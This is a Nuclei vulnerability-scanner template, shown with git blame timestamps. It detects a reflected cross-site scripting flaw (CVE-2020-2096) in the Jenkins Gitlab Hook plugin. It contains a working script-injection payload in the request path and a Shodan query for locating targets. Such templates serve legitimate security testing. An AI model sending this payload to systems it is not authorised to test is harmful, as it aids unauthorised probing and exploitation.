nuclei-templates/cves/2020/CVE-2020-2096.yaml

44 lines
1.3 KiB
YAML
Raw Normal View History

2021-01-02 04:56:15 +00:00
id: CVE-2020-2096
2020-04-08 10:59:57 +00:00
info:
name: Jenkins Gitlab Hook <=1.4.2 - Cross-Site Scripting
2020-04-08 10:59:57 +00:00
author: madrobot
2020-05-25 07:49:06 +00:00
severity: medium
description: Jenkins Gitlab Hook 1.4.2 and earlier does not escape project names in the build_now endpoint, resulting in a reflected cross-site scripting vulnerability.
reference:
2021-03-10 11:31:41 +00:00
- https://jenkins.io/security/advisory/2020-01-15/#SECURITY-1683
- http://www.openwall.com/lists/oss-security/2020/01/15/1
- http://packetstormsecurity.com/files/155967/Jenkins-Gitlab-Hook-1.4.2-Cross-Site-Scripting.html
- https://nvd.nist.gov/vuln/detail/CVE-2020-2096
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2020-2096
cwe-id: CWE-79
metadata:
shodan-query: http.title:"GitLab"
tags: jenkins,xss,gitlab,plugin,packetstorm,cve,cve2020
2020-04-08 10:59:57 +00:00
requests:
- method: GET
path:
2021-11-24 07:58:52 +00:00
- "{{BaseURL}}/gitlab/build_now%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
matchers-condition: and
2020-04-08 10:59:57 +00:00
matchers:
- type: status
status:
2020-05-25 07:49:06 +00:00
- 200
2021-11-24 07:58:52 +00:00
2020-04-08 14:42:57 +00:00
- type: word
2020-04-08 10:59:57 +00:00
part: body
2021-11-23 11:01:24 +00:00
words:
2021-11-24 07:58:52 +00:00
- "</script><script>alert(document.domain)</script>"
- type: word
2021-11-23 11:01:24 +00:00
part: header
2021-11-24 07:58:52 +00:00
words:
- text/html
# Enhanced by mp on 2022/08/14